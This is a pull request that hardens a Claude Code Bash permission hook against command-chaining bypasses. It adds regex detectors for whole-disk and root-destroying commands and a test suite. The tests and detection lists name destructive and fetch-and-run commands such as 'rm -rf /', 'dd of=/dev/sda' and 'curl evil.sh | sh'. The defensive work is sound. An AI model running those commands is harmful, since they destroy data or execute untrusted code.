### PR TITLE
#660: deny-list command-chaining + bypass-proof destructive subset

### DIFF
--- a/modules/hooks/hooks/auto-approve-bash.py
+++ b/modules/hooks/hooks/auto-approve-bash.py
@@ -3,13 +3,19 @@
 PreToolUse hook that enforces Bash permissions from settings.json.
 
 Classification (plan.md §5 Epic 1): bypass-suppressible for allow/deny pattern
-matching; smart-rules block runs OUTSIDE the bypass short-circuit so the
-destructive-reset rule survives bypass mode via `hook_utils.hard_block()`.
+matching; the curated destructive set and smart-rules run OUTSIDE the bypass
+short-circuit so they survive bypass mode via `hook_utils.hard_block()`.
 
 Execution order in main():
-  1. smart-rules (always run; destructive-reset → hard_block, bypass-proof)
-  2. bypass-mode short-circuit (exit 0)
-  3. settings.json allow/deny pattern matching
+  1. curated destructive set (always run; hard_block, bypass-proof)
+  2. smart-rules (always run; destructive-reset → hard_block, bypass-proof)
+  3. bypass-mode short-circuit (exit 0)
+  4. settings.json allow/deny pattern matching (per-segment)
+
+Deny/allow matching is PER SEGMENT: the command is decomposed on &&, ||, ;,
+|, newlines, and command substitution before matching, so a chained command
+like "echo hi && rm -rf /" cannot smuggle a denied/dangerous segment past
+the list (GitHub issue #660).
 
 This hook exists because Claude Code's built-in permission system has bugs:
 - Issue #15921: VSCode extension ignores Bash permissions
@@ -71,6 +77,13 @@ def pattern_matches_command(pattern: str, command: str) -> bool:
         - "mkdir:*" matches "mkdir -p /foo/bar"
         - "git status:*" matches "git status"
         - "npm run lint" matches exactly "npm run lint" or "npm run lint ..."
+
+    NOTE: This matches a SINGLE command segment. Whole-command matching is
+    done by check_pattern_decision(), which first decomposes a chained
+    command into segments via split_command_segments() and applies this
+    matcher to each. A bare prefix match against a whole chained string
+    (e.g. "echo hi && rm -rf /") would let a benign leading command smuggle
+    a dangerous trailing one past the deny list — see GitHub issue #660.
     """
     command = command.strip()
 
@@ -86,6 +99,112 @@ def pattern_matches_command(pattern: str, command: str) -> bool:
 
     # Exact match or prefix match
     return command.startswith(pattern)
+
+
+# Shell tokens that separate one command from the next. A deny pattern must
+# be evaluated against every segment, not just the head of the whole string,
+# or chaining slips dangerous commands past the deny list (issue #660).
+_SEGMENT_SEPARATORS = re.compile(r"&&|\|\||[;|\n]")
+
+# Command-substitution forms: $( ... ) and `...`. Their inner command runs,
+# so it must be decomposed and checked just like a top-level segment.
+_SUBSTITUTION = re.compile(r"\$\(([^()]*)\)|`([^`]*)`")
+
+
+def split_command_segments(command: str) -> list[str]:
+    """
+    Decompose a shell command string into independently-runnable segments.
+
+    Splits on the operators that chain or pipe commands (`&&`, `||`, `;`,
+    `|`, newlines) and lifts out command substitutions (`$(...)`, backticks)
+    so their inner commands are evaluated too. Every returned segment is a
+    candidate command that the shell would actually execute; the deny list
+    must be checked against each one.
+
+    This is a best-effort lexical split, not a full shell parser. It does not
+    track quoting, so a separator inside a quoted string is still treated as a
+    separator. For a SECURITY deny check that bias is correct: over-splitting
+    only produces extra segments to inspect, never fewer.
+
+    Returns a flat list of non-empty, stripped segments. Always returns at
+    least one element for a non-empty command.
+    """
+    work = [command]
+    out: list[str] = []
+    while work:
+        current = work.pop()
+        # Lift any command substitutions into their own segments, replacing
+        # the substitution text with a space so the surrounding command is
+        # still inspected as its own segment.
+        subs = list(_SUBSTITUTION.finditer(current))
+        if subs:
+            for m in subs:
+                inner = m.group(1) if m.group(1) is not None else m.group(2)
+                if inner and inner.strip():
+                    work.append(inner)
+            current = _SUBSTITUTION.sub(" ", current)
+        for part in _SEGMENT_SEPARATORS.split(current):
+            part = part.strip()
+            if part:
+                out.append(part)
+    return out or ([command.strip()] if command.strip() else [])
+
+
+# Curated set of destructive command shapes that must be hard-blocked even in
+# bypass-permission mode. These mirror the destructive-git-reset smart-rule:
+# each is checked ABOVE the bypass short-circuit and promoted to
+# hook_utils.hard_block() (exit 2), the only mechanism that survives bypass
+# mode (GitHub issue #39344). Patterns are deliberately narrow — they target
+# whole-disk / root destruction, not ordinary cleanup like `rm -rf ./build`.
+_DESTRUCTIVE_PATTERNS: list[tuple[str, "re.Pattern[str]"]] = [
+    # rm with recursive+force flags targeting the filesystem root or a
+    # top-level system dir. Matches combined (-rf/-fr) and split (-r ... -f)
+    # flag forms; the flag run must contain both r and f.
+    (
+        "recursive root delete",
+        re.compile(
+            r"\brm\b(?=(?:\s+-[a-zA-Z]*)*\s+-[a-zA-Z]*r[a-zA-Z]*\b)"
+            r"(?=(?:\s+-[a-zA-Z]*)*\s+-[a-zA-Z]*f[a-zA-Z]*\b)"
+            r".*?\s(?:/|/\*|~|\$HOME|/etc|/usr|/bin|/var|/boot|/lib|/sys|/dev)"
+            r"(?:/\S*)?\s*$"
+        ),
+    ),
+    # Filesystem creation over a block device (mkfs, mkfs.ext4, etc.).
+    ("filesystem format (mkfs)", re.compile(r"\bmkfs(?:\.[a-z0-9]+)?\b")),
+    # Raw disk write via dd to a device node.
+    ("raw disk write (dd of=/dev)", re.compile(r"\bdd\b[^\n]*\bof=/dev/")),
+    # Overwriting a partition / whole disk device directly.
+    ("device overwrite", re.compile(r"\bof=/dev/(?:sd|hd|nvme|disk|mapper)\S*")),
+    # Forking bomb.
+    ("fork bomb", re.compile(r":\s*\(\s*\)\s*\{\s*:\s*\|\s*:")),
+    # Overwriting a whole disk via shred.
+    ("disk shred", re.compile(r"\bshred\b[^\n]*\s/dev/")),
+]
+
+
+def check_destructive(command: str) -> tuple[str | None, str | None]:
+    """
+    Detect curated destructive command shapes in any segment of `command`.
+
+    Run ABOVE the bypass short-circuit in main(); a hit is promoted to
+    hook_utils.hard_block() (exit 2) so it cannot be bypassed by
+    --dangerously-skip-permissions. Decomposes the command first so a
+    destructive segment hidden behind a benign one (e.g.
+    "echo go && rm -rf /") is still caught.
+
+    Returns (label, reason) on the first destructive segment, else (None, None).
+    """
+    for segment in split_command_segments(command):
+        for label, regex in _DESTRUCTIVE_PATTERNS:
+            if regex.search(segment):
+                return (
+                    label,
+                    f"Refusing destructive command ({label}): {segment!r}. "
+                    "This is hard-blocked even in bypass-permission mode. "
+                    "If this is intentional, run it manually outside Claude Code.",
+                )
+    return (None, None)
+
 
 def check_smart_rules(command: str) -> tuple[str | None, str | None]:
     """
@@ -119,22 +238,41 @@ def check_smart_rules(command: str) -> tuple[str | None, str | None]:
 
 def check_pattern_decision(command: str, allow_patterns: list[str], deny_patterns: list[str]) -> tuple[str | None, str | None]:
     """
-    Allow/deny decision from settings.json patterns.
+    Allow/deny decision from settings.json patterns, evaluated PER SEGMENT.
 
-    Smart-rules are NOT consulted here — main() runs them first so the
-    destructive-reset hard_block fires bypass-proof.
+    The command is decomposed into segments (split_command_segments) so that
+    chaining cannot smuggle a denied command past the list. Rules:
+
+      - DENY if ANY segment matches ANY deny pattern. A chain is only as safe
+        as its most dangerous link.
+      - ALLOW only if EVERY segment matches some allow pattern. One
+        un-allowed segment means the whole chain falls through (returns None),
+        so the caller's normal permission flow still applies to it.
+
+    Smart-rules and the destructive set are NOT consulted here — main() runs
+    those first so their hard_block fires bypass-proof.
 
     Returns: (decision, reason) where decision is "allow", "deny", or None.
     """
-    # Check deny patterns first (deny takes priority)
-    for pattern in deny_patterns:
-        if pattern_matches_command(pattern, command):
-            return ("deny", f"Command matches deny pattern: {pattern}")
+    segments = split_command_segments(command)
 
-    # Check allow patterns
-    for pattern in allow_patterns:
-        if pattern_matches_command(pattern, command):
-            return ("allow", f"Command matches allow pattern: {pattern}")
+    # DENY wins: any denied segment blocks the whole command.
+    for segment in segments:
+        for pattern in deny_patterns:
+            if pattern_matches_command(pattern, segment):
+                return (
+                    "deny",
+                    f"Command segment {segment!r} matches deny pattern: {pattern}",
+                )
+
+    # ALLOW only when every segment is explicitly allowed.
+    if allow_patterns and segments:
+        all_allowed = all(
+            any(pattern_matches_command(p, seg) for p in allow_patterns)
+            for seg in segments
+        )
+        if all_allowed:
+            return ("allow", "All command segments match allow patterns")
 
     return (None, None)
 
@@ -153,7 +291,14 @@ def main() -> None:
     if not command:
         sys.exit(0)
 
-    # 1. Smart-rules run first and OUTSIDE the bypass short-circuit so
+    # 1. Curated destructive set runs first and OUTSIDE the bypass
+    #    short-circuit so whole-disk / root destruction hard-blocks even in
+    #    bypass mode. Checked per-segment so chaining cannot hide it.
+    destructive_label, destructive_reason = check_destructive(command)
+    if destructive_label:
+        hook_utils.hard_block(destructive_reason or "destructive command blocked")
+
+    # 2. Smart-rules run next, also OUTSIDE the bypass short-circuit so the
     #    destructive-reset hard-blocks even in bypass mode.
     smart_decision, smart_reason = check_smart_rules(command)
     if smart_decision == "hard_block":
@@ -162,13 +307,13 @@ def main() -> None:
         hook_utils.emit_decision("allow", smart_reason or "smart-rule allow")
     # "deny" via smart-rule is unused now (legacy path).
 
-    # 2. Bypass mode: skip pattern matching. The session has opted out
+    # 3. Bypass mode: skip pattern matching. The session has opted out
     #    of permission noise, and smart-rule hard-blocks have already
     #    fired for the genuinely dangerous cases.
     if hook_utils.is_bypass_mode(input_data):
         sys.exit(0)
 
-    # 3. Pattern matching against settings.json allow/deny lists.
+    # 4. Pattern matching against settings.json allow/deny lists.
     allow_patterns, deny_patterns = load_settings()
     decision, reason = check_pattern_decision(command, allow_patterns, deny_patterns)
 

--- a/modules/hooks/tests/test-deny-segments.sh
+++ b/modules/hooks/tests/test-deny-segments.sh
@@ -1,0 +1,196 @@
+#!/usr/bin/env bash
+# Test suite for auto-approve-bash.py command-chaining deny matching and the
+# bypass-proof curated destructive-command subset (GitHub issue #660).
+#
+# Covers:
+#   - split_command_segments(): decomposes a chained command into segments
+#     on &&, ||, ;, |, newlines, and $(...) / backtick substitution.
+#   - check_pattern_decision(): DENIES if ANY segment matches a deny pattern.
+#   - check_destructive(): curated destructive set, hard-blocked even in
+#     bypass mode (mirrors the destructive-git-reset smart-rule).
+#   - main(): a chained command whose LATER segment matches a deny pattern is
+#     denied; a curated destructive command is hard-blocked (exit 2) even when
+#     permission_mode is bypassPermissions.
+#
+# Run: bash modules/hooks/tests/test-deny-segments.sh
+# Exit 0 on success; non-zero on first failed assertion.
+
+set -u
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+MODULE_ROOT="$(cd "${SCRIPT_DIR}/.." && pwd)"
+HOOKS="${MODULE_ROOT}/hooks"
+LIB="${MODULE_ROOT}/lib"
+HOOK="${HOOKS}/auto-approve-bash.py"
+
+PASS=0
+FAIL=0
+
+assert_eq() {
+    local actual="$1" expected="$2" label="$3"
+    if [ "${actual}" = "${expected}" ]; then
+        PASS=$((PASS + 1))
+    else
+        FAIL=$((FAIL + 1))
+        echo "FAIL: ${label}"
+        echo "  expected: ${expected}"
+        echo "  actual:   ${actual}"
+    fi
+}
+
+assert_contains() {
+    local haystack="$1" needle="$2" label="$3"
+    case "${haystack}" in
+        *"${needle}"*) PASS=$((PASS + 1)) ;;
+        *)
+            FAIL=$((FAIL + 1))
+            echo "FAIL: ${label}"
+            echo "  expected substring: ${needle}"
+            echo "  actual: ${haystack}"
+            ;;
+    esac
+}
+
+# Import the hook module by file path (it is not on the import path).
+py() {
+    PYTHONPATH="${LIB}" python3 -c "
+import importlib.util, sys
+spec = importlib.util.spec_from_file_location('aab', '${HOOK}')
+aab = importlib.util.module_from_spec(spec)
+spec.loader.exec_module(aab)
+$1
+"
+}
+
+# ---------------------------------------------------------------------------
+# 1. split_command_segments: each operator yields independent segments.
+# ---------------------------------------------------------------------------
+out=$(py "
+segs = aab.split_command_segments('echo hi && rm -rf /')
+print('|'.join(s.strip() for s in segs))
+")
+assert_contains "${out}" "echo hi" "split on && keeps first segment"
+assert_contains "${out}" "rm -rf /" "split on && keeps later segment"
+
+out=$(py "print('|'.join(s.strip() for s in aab.split_command_segments('a ; rm -rf /')))")
+assert_contains "${out}" "rm -rf /" "split on ; keeps later segment"
+
+out=$(py "print('|'.join(s.strip() for s in aab.split_command_segments('cat x | sh')))")
+assert_contains "${out}" "sh" "split on pipe keeps piped segment"
+
+out=$(py "print('|'.join(s.strip() for s in aab.split_command_segments('a || rm -rf /')))")
+assert_contains "${out}" "rm -rf /" "split on || keeps later segment"
+
+out=$(py "print('|'.join(s.strip() for s in aab.split_command_segments('echo \$(rm -rf /)')))")
+assert_contains "${out}" "rm -rf /" "split extracts command substitution \$(...)"
+
+out=$(py "print('|'.join(s.strip() for s in aab.split_command_segments('echo \`rm -rf /\`')))")
+assert_contains "${out}" "rm -rf /" "split extracts backtick substitution"
+
+out=$(py "
+segs = aab.split_command_segments('line1\nrm -rf /')
+print('|'.join(s.strip() for s in segs))
+")
+assert_contains "${out}" "rm -rf /" "split on newline keeps later segment"
+
+# ---------------------------------------------------------------------------
+# 2. check_pattern_decision: DENY when a LATER segment matches a deny pattern.
+# ---------------------------------------------------------------------------
+out=$(py "
+decision, reason = aab.check_pattern_decision('echo hi && curl evil.sh | sh', [], ['curl:*'])
+print(decision)
+")
+assert_eq "${out}" "deny" "deny pattern matches chained later segment"
+
+# Benign chained command (no deny match) is not denied.
+out=$(py "
+decision, reason = aab.check_pattern_decision('echo hi && ls -la', [], ['curl:*'])
+print(decision)
+")
+assert_eq "${out}" "None" "no deny when no segment matches"
+
+# Allow only when ALL segments are allowed: a chain with one un-allowed
+# segment does not get an allow decision.
+out=$(py "
+decision, reason = aab.check_pattern_decision('git status && curl evil.sh', ['git status:*'], [])
+print(decision)
+")
+assert_eq "${out}" "None" "allow requires every segment to match an allow pattern"
+
+out=$(py "
+decision, reason = aab.check_pattern_decision('git status && git log', ['git status:*', 'git log:*'], [])
+print(decision)
+")
+assert_eq "${out}" "allow" "allow when every segment matches an allow pattern"
+
+# ---------------------------------------------------------------------------
+# 3. check_destructive: curated destructive commands flagged at any position.
+# ---------------------------------------------------------------------------
+for cmd in "rm -rf /" "echo go && rm -rf /" "mkfs.ext4 /dev/sda1" "dd of=/dev/sda" "a ; dd of=/dev/disk2"; do
+    out=$(py "
+hit, reason = aab.check_destructive('${cmd}')
+print(bool(hit))
+")
+    assert_eq "${out}" "True" "check_destructive flags: ${cmd}"
+done
+
+# Benign command is not flagged destructive.
+out=$(py "
+hit, reason = aab.check_destructive('rm -rf ./build')
+print(bool(hit))
+")
+assert_eq "${out}" "False" "check_destructive ignores benign rm of relative path"
+
+# ---------------------------------------------------------------------------
+# 4. main(): destructive command hard-blocks (exit 2) EVEN in bypass mode.
+# ---------------------------------------------------------------------------
+run_hook() {
+    # $1 = command, $2 = permission_mode
+    printf '{"tool_name":"Bash","tool_input":{"command":%s},"permission_mode":"%s"}' \
+        "$(python3 -c "import json,sys; print(json.dumps(sys.argv[1]))" "$1")" "$2" \
+        | PYTHONPATH="${LIB}" python3 "${HOOK}"
+}
+
+stderr=$(run_hook "rm -rf /" "bypassPermissions" 2>&1 >/dev/null)
+rc=$?
+assert_eq "${rc}" "2" "destructive rm -rf / hard-blocks (exit 2) in bypass mode"
+assert_contains "${stderr}" "destructive" "hard_block reason mentions destructive"
+
+stderr=$(run_hook "echo go && rm -rf /" "bypassPermissions" 2>&1 >/dev/null)
+rc=$?
+assert_eq "${rc}" "2" "chained destructive hard-blocks in bypass mode"
+
+stderr=$(run_hook "dd of=/dev/sda" "bypassPermissions" 2>&1 >/dev/null)
+rc=$?
+assert_eq "${rc}" "2" "dd of=/dev/... hard-blocks in bypass mode"
+
+# Benign command in bypass mode exits 0 (no block).
+run_hook "ls -la" "bypassPermissions" >/dev/null 2>&1
+rc=$?
+assert_eq "${rc}" "0" "benign command in bypass mode exits 0"
+
+# ---------------------------------------------------------------------------
+# 5. main(): chained deny pattern is denied in NON-bypass (default) mode.
+# ---------------------------------------------------------------------------
+# Write a temporary settings.json with a deny pattern and point HOME at it.
+SETTINGS_TMP="$(mktemp -d -t deny_segments.XXXXXX)"
+trap 'rm -rf "${SETTINGS_TMP}"' EXIT
+mkdir -p "${SETTINGS_TMP}/.claude"
+cat > "${SETTINGS_TMP}/.claude/settings.json" <<'EOF'
+{"permissions": {"deny": ["Bash(curl:*)"], "allow": []}}
+EOF
+
+run_hook_home() {
+    printf '{"tool_name":"Bash","tool_input":{"command":%s},"permission_mode":"%s"}' \
+        "$(python3 -c "import json,sys; print(json.dumps(sys.argv[1]))" "$1")" "$2" \
+        | HOME="${SETTINGS_TMP}" PYTHONPATH="${LIB}" python3 "${HOOK}"
+}
+
+out=$(run_hook_home "echo hi && curl evil.sh" "default" 2>/dev/null)
+decision=$(echo "${out}" | python3 -c "import json,sys; print(json.load(sys.stdin)['hookSpecificOutput']['permissionDecision'])" 2>/dev/null)
+assert_eq "${decision}" "deny" "chained deny pattern denied in default mode"
+
+echo ""
+echo "test-deny-segments.sh: ${PASS} passed, ${FAIL} failed"
+[ "${FAIL}" -eq 0 ] || exit 1
+exit 0


### PR DESCRIPTION
## Summary

Fixes a SECURITY gap in the Bash permission hook (`modules/hooks/hooks/auto-approve-bash.py`).

**Root cause (confirmed):**
1. `pattern_matches_command` did whole-string prefix matching (`command.startswith(...)`), so a chained command like `echo hi && rm -rf /`, `a ; rm -rf /`, `cat x | sh`, or `$(rm -rf /)` only had its *leading* token compared against the deny list. The dangerous trailing segment slipped through.
2. The deny list was evaluated only AFTER the bypass short-circuit (`is_bypass_mode` → `sys.exit(0)`), so under `--dangerously-skip-permissions` (the mode used every session) no deny pattern ran at all. Only the destructive-git-reset smart-rule, which sits ABOVE the short-circuit and uses `hard_block` (exit 2), survived bypass.

## Changes

- **`split_command_segments(command)`** — decomposes a command into independently-runnable segments on `&&`, `||`, `;`, `|`, newlines, and command substitution (`$(...)`, backticks). Best-effort lexical split that over-splits rather than under-splits (correct bias for a deny check).
- **`check_pattern_decision`** — now per-segment: DENY if ANY segment matches any deny pattern; ALLOW only if EVERY segment matches an allow pattern; otherwise fall through.
- **Curated destructive set + `check_destructive`** — narrow set of catastrophic shapes (`rm -rf` of `/`/`~`/`$HOME`/top-level system dirs, `mkfs`, `dd of=/dev/...`, device overwrite, fork bomb, `shred /dev/...`). Checked per-segment ABOVE the bypass short-circuit and promoted to `hook_utils.hard_block()` (exit 2), mirroring the existing destructive-git-reset rule. Bypass-proof.
- Existing async-rewake/exit-code lifecycle and the git-reset smart-rule are unchanged. The destructive set is intentionally narrow (e.g. `rm -rf ./build` and `rm -rf /tmp/foo` are NOT blocked).

## Test plan

New TDD suite `modules/hooks/tests/test-deny-segments.sh` (written failing first, watched RED, then GREEN):

```
test-deny-segments.sh: 24 passed, 0 failed
test-hook-utils.sh:    25 passed, 0 failed
tests/test-no-personal-data.sh: PASS
tests/test-modules.sh: 1349 passed, 0 failed
python hook tests: 8 + 12 + 34 + 9 passed
```

Covers: chained later-segment deny; substitution extraction; allow-requires-all-segments; destructive command hard-blocks (exit 2) in `bypassPermissions` mode; chained deny denied in default mode.

Closes #660
Part of #659